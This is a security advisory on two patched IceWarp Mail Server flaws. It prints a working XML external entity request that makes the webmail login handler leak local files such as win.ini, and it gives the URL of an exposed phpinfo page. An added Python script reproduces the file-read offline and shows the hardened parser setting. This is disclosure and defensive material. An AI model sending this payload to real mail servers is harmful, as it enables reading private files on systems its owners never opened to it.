Trustwave's SpiderLabs Security Advisory TWSL2011-013:
Multiple Vulnerabilities in IceWarp Mail Server

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt

Published: 2011-09-23
Version: 1.0

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 10.3.2 and below

Product description:
IceWarp WebMail is the web front-end for the IceWarp Mail Server, which provides email access on over 50,000 servers. IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.

Credit: David Kirkpatrick of Trustwave's SpiderLabs

Finding 1: XML External Entity Injection
CVE: CVE-2011-3579

An external entity is a feature of the XML specification that lets an XML document reference resources outside the document itself. When such a document is parsed, the parser fetches the referenced resource and substitutes its content wherever the entity is referenced. In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive into the authentication request handled by webmail.php, and the server-side parser resolves it against the local file system of the host where IceWarp is installed. Because the value of the <username> element is echoed back in the "login_invalid" error response, any file readable by the server process can be retrieved with this technique. The same attack can also be used to create a possible denial of service condition, for example by referencing a resource that never finishes being read.
Proof-of-Concept:

The following POST request was sent to the host A.B.C.D where the IceWarp mail server was running:

REQUEST
=========

POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache

<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>

RESPONSE:
==========

HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul 2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113

<?xml version="1.0" encoding="utf-8"?><iq type="error"><error uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
...TRUNCATED

The above proof-of-concept retrieves the c:\windows\win.ini file: the server echoes the expanded <username> value, file contents included, inside the "login_invalid" error element (the response in this example has been truncated).

Finding 2: PHP Information Disclosure
CVE: CVE-2011-3580

It is possible to retrieve the PHP information page generated by phpinfo() by accessing the following URL, where A.B.C.D is the IP of the server running the IceWarp software:

http://A.B.C.D/server

The response is a page detailing the PHP version in use and the configuration settings of PHP, including system details.
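The following Python script is an added illustration of Finding 1 and is not part of the Trustwave advisory or of IceWarp's code. It rebuilds the advisory's request body with the SYSTEM entity pointed at a constructed local file, then parses it twice with Python's xml.sax: once with external general entity resolution switched on (standing in for the behaviour of the vulnerable webmail.php parser) and once with it off (the hardened setting, and Python's own default since 3.7.1). The function names, the placeholder digest value, the login_error_response() echo and the sample file contents are all assumptions made for this demonstration.

```python
"""Added example (not from the advisory): Finding 1 reproduced offline with
Python's xml.sax. Function names, the placeholder digest, the error echo and
the sample 'secret' file are constructed for this demonstration."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class AuthHandler(ContentHandler):
    """Collects the text of <username>, the way a webmail login handler must
    read it before echoing it into a login_invalid error."""

    def __init__(self):
        super().__init__()
        self._in_username = False
        self.username = ""

    def startElement(self, name, attrs):
        if name == "username":
            self._in_username = True

    def endElement(self, name):
        if name == "username":
            self._in_username = False

    def characters(self, content):
        # Delivered in chunks, including text pulled in from an expanded
        # external entity, so accumulate rather than assign.
        if self._in_username:
            self.username += content


def parse_auth(xml_bytes, resolve_external_entities):
    """Parse a webmail:iq:auth request and return the <username> text.

    resolve_external_entities=True mirrors the vulnerable behaviour: the
    parser fetches SYSTEM entities and splices their content into the
    document. False is the hardened setting.
    """
    handler = AuthHandler()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.username


def build_xxe_payload(target_uri, entity_name="xxeb91c4"):
    """Build the advisory's request body with the entity aimed at target_uri.
    The <digest> value is a constructed placeholder, not a real RSA digest."""
    return (
        f'<!DOCTYPE foo [<!ENTITY {entity_name} SYSTEM "{target_uri}"> ]>'
        f'<iq type="set"><query xmlns="webmail:iq:auth">'
        f'<username>test&{entity_name};</username>'
        f'<digest>00</digest><method>RSA</method></query></iq>'
    ).encode("utf-8")


def login_error_response(username):
    """Constructed stand-in for the server echoing the rejected username."""
    return f'<iq type="error"><error uid="login_invalid">{username}</error></iq>'


def demo(secret_text="secret=hunter2 (constructed stand-in for win.ini)"):
    """Write a constructed 'local file', then parse the same payload with the
    vulnerable and the hardened parser. Returns (leaked, safe) usernames.
    secret_text must stay well-formed as XML character data (no '<', '&', ']')."""
    fd, path = tempfile.mkstemp(suffix=".ini")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(secret_text.encode("utf-8"))
        payload = build_xxe_payload(pathlib.Path(path).as_uri())
        leaked = parse_auth(payload, resolve_external_entities=True)
        safe = parse_auth(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser echoes:", login_error_response(leaked))
    print("hardened parser echoes:  ", login_error_response(safe))
```

With resolution enabled the echoed username is "test" followed by the whole file, exactly the shape of the win.ini leak in the response above; with it disabled the entity expands to nothing and only "test" comes back, which is what a patched server should return. For the PHP stack the advisory describes, the equivalent hardening is to never parse untrusted XML with entity substitution enabled (libxml_disable_entity_loader(true) on older libxml2 builds; libxml2 2.9.0 and later no longer load external entities unless LIBXML_NOENT is requested), and to stop reflecting the raw username into the error response.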
Vendor Response:

These issues have been addressed as of version 10.3.3.

Remediation Steps:

Customers should update to the latest version of IceWarp Mail Server in order to address these issues. The above issues have been corrected in version 10.3.3.

Revision History:

08/03/11 - Vulnerability disclosed
09/19/11 - Patch released
09/23/11 - Advisory published

About Trustwave:

Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:

SpiderLabs is the advanced security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs

Disclaimer:

The information provided in this advisory is provided "as is" without warranty of any kind.
Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.

This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.